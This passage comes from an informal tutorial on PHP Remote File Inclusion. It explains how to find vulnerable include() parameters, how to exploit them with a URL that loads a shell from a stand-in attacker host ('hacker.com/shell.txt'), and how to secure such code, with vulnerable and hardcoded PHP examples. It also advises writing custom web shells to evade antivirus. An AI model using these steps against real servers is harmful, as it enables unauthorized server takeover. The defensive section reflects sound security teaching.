This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script and save it as .txt, upload it to a server and then visit something like this:

http://www.site.com/index.php?page=http://hacker.com/shell.txt?

Note that the ? is to get rid of the “.php” at the end as we did not name the file .txt.php and also if you where to try to include a .php file from a remote server it will only give the executed output of the PHP file.

Now we have successfully put out code in the PHP engine of the victim server and we are free to do whatever you can do with PHP. Which is mostly anything.

 2.Finding RFI vulnerabilities


Like said above. To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages looking like the one above. For more advance ones you might need to try things out, this is called blind RFI. As you gain more knowledge about PHP and RFI you will understand how to perform blind RFI's.

Here is a few examples of GET arguments manipulating:

www.site.com/index.php?id=1→
www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index→
www.site.com/index.php?id=fuckkkk
www.site.com/index.php?id=lolzzzz


Use your imagination... And for those who did not understand. The arguments does not need to be “id” or “page” or “site”. It can be anything.

There are more advance versions of RFI like POST argument RFI and even cookie RFI and HTTP header RFI and so on. But these should be easy to understand once you gain more knowledge about the HTTP protocol and TCP/IP with HTTP servers and PHP etc.

3.Exploiting RFI vulnerabilities


Lets say that you have successfully found a vulnerable page.

The URL is www.site.com/index.php?page=index

The PHP script is made in such a way that we only need to edit page=index to page=http://hacker.com/shell.txt and we now got our PHP code over to the victims server and it executes.

What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer like actions. Like read/write/edit/create files and navigate in folders etc etc. Some shells even got inbuilt exploits to gain root access on the server, but that's another story.

Now, there is a truckload of premade shells out there but I really recommend you creating your own as it is good learning and most shells is actually detected by antiviruses believe it or not. So if the server you are trying to access got a antivirus it will now work and it might perhaps spoil your attack.

4.Securing RFI vulnerabilities


Secure user inputs!!!! And not just those you THINK is used in SQL queries or include functions or etc. ALL user inputs should be secured. You do this by strip/disallow words or phrases or symbols in the user inputs. And the most common solution when it comes to RFI is just to make the page less dynamic and hardcode the pages. If you still want to have a dynamical editable page you MUST make sure you secure the user inputs. Check it for the word “http”, check it for the word “www.”, check it for “../”, check it for “?” etc etc. Disable “show PHP errors” in the PHP configuration. Do a file_exists() check. These are all easy things you can do to prevent RFI(and LFI, but that is again another story).

Here is a example on a dynamic page and a hardcoded page. The dynamic one is not secure, the hardcoded one is.

Dynamic:

PHP Code: if (isset($_GET['page'])) {
   include($_GET['page'] . “.php”); } else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>'); }  

Hardcoded:

PHP Code:
if (isset($_GET['page']))
{
   if ($_GET['page'] == “page1”)
      include(“1.php”);

   if ($_GET['page'] == “page2”)
      include(“2.php”);

   if ($_GET['page'] == “page3”)
      include(“3.php”);
}
else
{
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}  

Read More